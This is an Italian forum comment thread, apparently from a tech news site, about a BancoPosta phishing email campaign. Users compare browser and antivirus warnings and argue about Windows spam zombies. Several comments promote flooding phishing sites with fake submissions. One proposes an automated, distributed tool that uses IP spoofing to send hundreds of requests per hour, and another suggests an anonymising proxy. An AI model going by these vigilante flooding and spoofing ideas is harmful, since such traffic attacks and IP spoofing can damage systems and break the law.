      Purtroppo penso che fatta così serva a ben poco.... non ci vuole molto a filtrare delle richieste in base all'IP di provenienza!!Ci vorrebbe qualcosa di più evoluto che utilizzasse una tecnica tipo IP spoofing creando delle richieste provenienti sempre da un IP diverso (casuale) con dati plausibili e magari distribuito a più persone possibile.Sarebbe bello anche un bel server centrale a cui il programma si potrebbe collegare per scaricare le informazioni sul pishing..... tipo url, nome e formato dei campi, tipo di richiesta.... e poi in automatico dalla tray bar manda che so 100, 200 richieste all'ora in orari random..... sempre con IP diversi.Questo si che distruggerebbe i pisher!!!CiaoMassimo
      • djm scrive:
        Re: rispondete inserendo dati falsi
        Se vuoi IP a caso passa da un software tipo Stealther ed il pisher è servito. ;)
        • Anonimo scrive:
          Re: rispondete inserendo dati falsi
          Non è la stessa cosa..... così alla fine hai solo tante richieste da parte degli stessi proxy non hai un indirizzo IP random.Quello a cui pensavo io era una cosa tipoanti-phishing@home :PCiaoMassimo
        • Anonimo scrive:
          Re: rispondete inserendo dati falsi
          - Scritto da: djm
          Se vuoi IP a caso passa da un software tipo
          Stealther ed il pisher è servito.
          ;) "phisher"
    • Anonimo scrive:
      Re: rispondete inserendo dati falsi
      Marò che spreco! :s
    • mda scrive:
      Re: rispondete inserendo dati falsi
      - Scritto da: Anonimo
      I ho risposto alla mail sul bancoposta con lo
      script che vedete sotto. Eseguito per dieci volte
      sono riuscito a consegnare ai simpatici pescatori
      ben 100000 record veramente fasulli.

      dim http
      dim i
      Funziona anche in Xbasic che è gratuito e velocissimo e gira anche su linux !http://www.xbasic.org/Sei un genio !Ciao
    • Anonimo scrive:
      Re: rispondete inserendo dati falsi
      - Scritto da: Anonimo
      I ho risposto alla mail sul bancoposta con lo
      script che vedete sotto. Eseguito per dieci volte
      sono riuscito a consegnare ai simpatici pescatori
      ben 100000 record veramente fasulli.
      ottimo. magari provo a farne un porting in python oppure java. :)Simone
  • gattuati scrive:
    Grazie Thunderbird
    Thunderbird me lo ha segnalato come messaggio proveniente da sito sospetto.(rotfl)
  • Anonimo scrive:
    Re: rispondete inserendo dati falsi
    Rispondete inserendo dati tipo "suck" "mydick", e' piu' divertente...
  • Anonimo scrive:
    rispondete inserendo dati falsi
    ....è l'unica vera arma per combatterli.
  • TieFighter scrive:
    Ricevute due copie
    In inbox ora. Effettivamente sono fatte molto bene.
    • Anonimo scrive:
      Re: Ricevute due copie
      - Scritto da: TieFighter
      In inbox ora. Effettivamente sono fatte molto
      bene.Ih, ih, ih. Io ci ho anche cliccato sopra. Volevo vedere come si comportava Firefox (tanto anche se si fosse comportato male non avrei certamente inserito alcun dato).Invece si è comportato benissimo, bloccando l'accesso al sito truffaldino.
    • Anonimo scrive:
      Re: Ricevute due copie
      - Scritto da: TieFighter
      In inbox ora. Effettivamente sono fatte molto
      bene.per un niubbo sicurose poi clicca sui link riportati nella e-mail invece che aprire il sito dal preferito salvatoP.s.nel messaggio di bancoposta la copia del vero sito è buona manca solo che il login è senza lucchetto
      • Anonimo scrive:
        Re: Ricevute due copie
        Io ho ricevuto l'email bancoposta e l'ho letta con outlook!Ho cliccato sopra e mozilla mi ha dato sito non raggiungibile 8) Dopo pochi secondi Kaspersky mi ha rilevato un troyan presente nella cartella temp di internet explorer con estensione .tmp!Ovviamente ho provveduto a eliminarlo immediatamente ;)
  • Anonimo scrive:
    Grazie MS
    Senza te e i tuoi winzombie, tutto ciò non sarebbe possibile.Your mailbox, our phishing...
    • Anonimo scrive:
      LOL
      - Scritto da: Anonimo
      Senza te e i tuoi winzombie, tutto ciò non
      sarebbe possibile.

      Your mailbox, our phishing...Un commento meno idiota?
      • Anonimo scrive:
        Re: LOL
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        Senza te e i tuoi winzombie, tutto ciò non

        sarebbe possibile.



        Your mailbox, our phishing...

        Un commento meno idiota?Eh, già, perché adesso le email di spam, le mandano per posta prioritaria, o dal c64 collegato in rete...Windows e la ciofeca che rappresenta, ci fa bruciare miliardi di dollari, in spese per la sicurezza, in spese quando questa sicurezza pagata a caro prezzo va a farsi benedire (bloccando servizi e imprese e facendo perdere denari a chi viene colpito da attacchi o viene infettato dall'ultima porcheria che gira perfino via email), in denari truffati tramite phishing, worm, trojan (che vi fregano il codice della carta di credito e le password da sotto il naso) e quant'altro, in spese di continui aggiornamento di PC solo per stare dietro agli ultimi capricci della MS, e nonostante tutto ciò esiste ancora chi riesce a nascondere la testa sotto terra, come gli struzzi, e negare anche l'evidenza.Adesso i winzombie non esistono, e magari sono solo un'invenzione dei linari o dei macachi per incoraggiare l'uso del loro sistema. I virus per non prenderli basta solo evitare gli spifferi, e per i worm e i trojan, basta usare il profilattico e si sta tranquilli.Andatelo a raccontare a chi ogni anno sotto la voce sicurezza spende cifre con diversi, svariati zeri, e sotto la voce danni causati della mancata sicurezza informatica ha cifre con altrettanti zeri.MS è un pozzo senza fondo, e un male per l'informatica e per l'economia che ci gira intorno, e oggi come oggi non esiste più nulla che in qualche misura non si appoggi anche in minima parte al settore informatico.Pensa solo a quanto risparmierebbe un'amministrazione pubblica che decidesse di slegarsi da questo info-mafia-legalizzata. Beh, che tu ci creda o no, qualcuno ha fatto questo conticino, e sta iniziando la migrazione verso altri lidi più sicuri e meno dispendiosi.
    • Anonimo scrive:
      Re: Grazie MS
      - Scritto da: Anonimo
      Senza te e i tuoi winzombie, tutto ciò non
      sarebbe possibile.

      Your mailbox, our phishing...veramente le email arrivano su ogni sistema e su ogni programma di posta... PS: detto da uno da odia uindos
      • Anonimo scrive:
        Re: Grazie MS
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        Senza te e i tuoi winzombie, tutto ciò non

        sarebbe possibile.



        Your mailbox, our phishing...

        veramente le email arrivano su ogni sistema e su
        ogni programma di posta...

        PS: detto da uno da odia uindosSi, arrivano ovunque, ma il problema è che vengono sparate unicamente dai winzombie. Quindi è anche peggio, perché quella ciofeca che qualcuno si ostina a chiamare sistema operativo, rompe le scatole non solo ai suoi simili, ma anche a chi con quella monnezza non avrebbe proprio nulla di che spartire.
        • Anonimo scrive:
          Re: Grazie MS
          - Scritto da: Anonimo


          Senza te e i tuoi winzombie, tutto ciò non


          sarebbe possibile.





          Your mailbox, our phishing...



          veramente le email arrivano su ogni sistema e su

          ogni programma di posta...



          PS: detto da uno da odia uindos

          Si, arrivano ovunque, ma il problema è che
          vengono sparate unicamente dai winzombie. si, ma non è che sia un grosso problema fare dello spam anche senza affidarsi ai bug di outlook
Chiudi i commenti